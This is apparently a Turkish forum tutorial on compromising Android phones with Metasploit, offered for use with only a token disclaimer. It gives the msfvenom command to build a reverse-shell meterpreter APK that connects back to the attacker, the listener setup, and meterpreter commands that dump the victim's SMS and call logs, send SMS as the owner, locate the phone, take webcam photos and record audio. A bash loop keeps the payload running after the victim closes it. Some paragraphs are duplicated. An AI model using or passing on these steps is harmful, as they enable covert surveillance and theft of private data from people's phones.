Öncelikle Selamun Aleyküm Arkadaşlar Ben Nam-ı Değer Chester Hoca
Bugün Sizlere Kali Linux ****sploit Yardımı İle Android Cihazlara Sızmayı Öğreteceğim.
NOT:Kötü Amaçlar İçin Kullanmayınız. Sorumluluk Kabul Etmiyorum.
Öncelikle Uçbirimimizi Açıyoruz. Komut Satıra Aşağıdakini Yazıyoruz.
NOT: Eğer İngilizce İse Desktop/ Yazıyoruz, LHOST Kendi İP Adresinizi test.apk yerine ise program adını Yazıyoruz. IP Adresi Öğrenmek İçin İse ifconfig Yazıyoruz.
Bugün Sizlere Kali Linux ****sploit Yardımı İle Android Cihazlara Sızmayı Öğreteceğim.
NOT:Kötü Amaçlar İçin Kullanmayınız. Sorumluluk Kabul Etmiyorum.
Öncelikle Uçbirimimizi Açıyoruz. Komut Satıra Aşağıdakini Yazıyoruz.
Kod:
[SIZE=5][COLOR=Red][SIZE=4][COLOR=White][COLOR=Blue][SIZE=5][SIZE=4][COLOR=White][COLOR=Blue][FONT=helvetica]msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 R > Masaüstü/test.apk[/FONT][/COLOR][/COLOR][/SIZE][/SIZE][/COLOR][/COLOR][/SIZE][/COLOR][/SIZE]
Kod:
msfconsole Diyerek MSFCONSOLE'yi Çalıştırıyoruz.
Daha sonra sırası ile aşağıdaki komutları giriyoruz.
3. maddede yine local ya da dış ip adresimizi giriyoruz. 4. maddede ise port numarasını giriyoruz tekrar. Son olarakexploit diyerek oluşturduğumuz payloadı dinlemeye başlıyoruz. Dosyayı açan kurbanlar burada birer birer listelenecek.
Karşı Taraf Programı İndirim Çalıştırdığı Zaman Size Bilgiler Gelcek ve Komut Satırında
Yazacak
komutunu girerek neler yapabileceğinizin detaylı bir dökümüne ulaşabilirsiniz.Birkaç can alıcı komutu aşağıya yazayım.
.
Kod:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST (Kendi IP Adresiniz)
set LPORT 4444
exploit
Karşı Taraf Programı İndirim Çalıştırdığı Zaman Size Bilgiler Gelcek ve Komut Satırında
Kod:
meterpreter
Kod:
help
Kod:
check_root : Cihaz rootlu mu onu gösterir.
dump_sms : Telefondaki tüm smsleri toplar.
dump_calllog : Tüm arama kayıtlarını toplar.
send_sms : İstediğiniz bir numaraya telefon sahibi adına sms gönderebilirsiniz.
wlan_geolocate : Bağlı olduğu wifi ağına ait adresi bulabilirsiniz.
webcam_snap : Telefon kamerasından anlık bir fotoğraf çekerek bunu bilgisayarınıza kaydedebilirsiniz.
record_mic : Anlık ses kaydı toplayabilirsiniz
Ek olarak istediğiniz bir komuta dair yardım da alabilirsiniz. Örneğin
yazarak bu komut ile başka neler yapabildiğinizi görebilirsiniz.
Kurban uygulamayı kapatsa dahi arkaplanda uygulamayı çalıştırarak takip etmeye devam etmek isterseniz aşağıdaki kodu bir txt dosyasına kaydedin ve uzantısını .sh olarak kaydedin. Daha sonra karşı telefona yükleyin. Bunuhelp yardımı ile gördüğünüz komutlardan birisi ile halletmeniz mümkün.
yazarak çalıştırın. Bundan sonra uygulama kapansa da siz istediğiniz işlemleri yapmaya devam edebilirsiniz.
Kod:
record_mic -h
Kurban uygulamayı kapatsa dahi arkaplanda uygulamayı çalıştırarak takip etmeye devam etmek isterseniz aşağıdaki kodu bir txt dosyasına kaydedin ve uzantısını .sh olarak kaydedin. Daha sonra karşı telefona yükleyin. Bunuhelp yardımı ile gördüğünüz komutlardan birisi ile halletmeniz mümkün.
Tüm bunları yaptıktan sonra terminale shell yazın ve dosyayı yüklediğiniz konuma giderek
Kod:
#!/bin/bash
while true
do am start user 0 -a android.intent.action.MAIN -n com.****sploit.stage/.MainActivity
sleep 20
done
Kod:
sh dosyaismi.sh